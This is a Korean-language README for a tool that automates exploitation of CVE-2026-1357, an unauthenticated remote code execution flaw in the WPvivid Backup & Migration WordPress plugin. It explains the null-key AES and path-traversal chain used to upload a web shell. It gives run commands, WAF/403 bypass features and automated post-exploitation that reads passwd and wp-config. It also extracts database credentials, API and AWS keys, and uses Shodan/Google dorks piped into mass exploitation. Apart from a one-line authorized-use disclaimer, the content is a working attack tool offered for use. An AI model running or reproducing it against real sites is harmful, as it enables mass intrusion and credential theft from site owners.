
# CVE-2026-1357 자동화 익스플로잇 도구 WPvivid Backup & Migration의 인증되지 않은 RCE 취약점인 CVE-2026-1357을 위한 자동화 익스플로잇 도구입니다. WordPress 대상을 스캔하고, WAF/403을 우회하며, 경로 탐색을 통해 셸을 업로드하고, 보고서 생성과 함께 사후 익스플로잇 정찰을 수행합니다.
CVE 크레딧: Lucas Montes (NiRoX)
도구 제작: CyberTechAjju
CVSS: 9.8 (치명적) | 영향: ≤ 0.9.123 | 패치됨: 0.9.124
승인된 보안 테스트 전용입니다. 시스템에 대한 무단 접근은 불법입니다.
두 가지 연쇄 버그를 통한 WPvivid Backup & Migration의 인증 없는 RCE:
openssl_private_decrypt()가 false를 반환 → phpseclib v1이 이를 null-byte AES 키로 처리 → 공격자가 16개의 null 바이트로 암호화name 필드 → ../uploads/shell.php가 백업 디렉토리를 벗어남제약 조건: wpvivid_api_token이 생성되고 만료되지 않은 경우에만 악용 가능.
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt
# 스캔만 (WordPress + WPvivid + 버전 탐지)
python3 cve_2026_1357.py -u http://target.com
# 스캔 + 악용 + 자동 사후 악용
python3 cve_2026_1357.py -u http://target.com --exploit
# 사후 악용 정찰 없이 악용
python3 cve_2026_1357.py -u http://target.com --exploit --no-post
# 보고서 포함 대량 스캔
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
# Burp 프록시 경유
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080
# 페이로드 전용 모드
python3 cve_2026_1357.py -u http://x --payload-only
-u, --url 단일 대상 URL
-l, --list URL 목록 파일 (한 줄에 하나)
--exploit 악용 모드 활성화
--shell NAME 셸 파일명 (기본값: pwn_remote.php)
--no-post 사후 악용 정찰 건너뛰기
--report Markdown PoC 보고서 생성
--report-dir DIR 보고서 출력 디렉토리
-t, --threads N 동시 스레드 수 (기본값: 5)
--timeout SECS 요청 시간 초과 (기본값: 10)
--proxy URL Burp용 HTTP 프록시
--payload-only base64 페이로드 출력 후 종료
전체 목록은 dorks.md 참조. 빠른 예시:
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"
# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"
# 파이프라인
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
| awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
CVE-2026-1357-poc/
├── cve_2026_1357.py ← 메인 도구 (스캐너 + 악용기 + 사후 악용)
├── dorks.md ← Shodan/Google/Censys/FOFA/ZoomEye dorks
├── requirements.txt ← Python 의존성
├── .gitignore
└── README.md ← 이 파일
Lucas Montes (NiRoX) — CVE 발견
CyberTechAjju — 악용 도구 제작
| 기능 | 설명 |
|---|
| 🔍 자동 탐지 | WordPress + WPvivid 플러그인 + 버전 핑거프린팅 |
| 🛡️ WAF 우회 | User-Agent 회전, 헤더 스푸핑, 인코딩 트릭 |
| 🔓 403 우회 | X-Forwarded-For, X-Original-URL, 경로 정규화, 이중 인코딩 |
| 💀 자동 악용 | Null-key AES 페이로드 + 경로 탐색 업로드 |
| 📋 사후 악용 | 20개 이상의 정찰 명령 자동 실행 (id, whoami, passwd, wp-config, SUID 등) |
| 🔑 데이터 추출기 | 출력에서 DB 자격 증명, API 키, 비밀번호, AWS 키 추출 |
| 📊 보고서 생성 | 전체 악용 증거가 포함된 Markdown PoC 보고서 |
| ⚡ 대량 스캔 | 프록시/Burp 지원 멀티스레드 |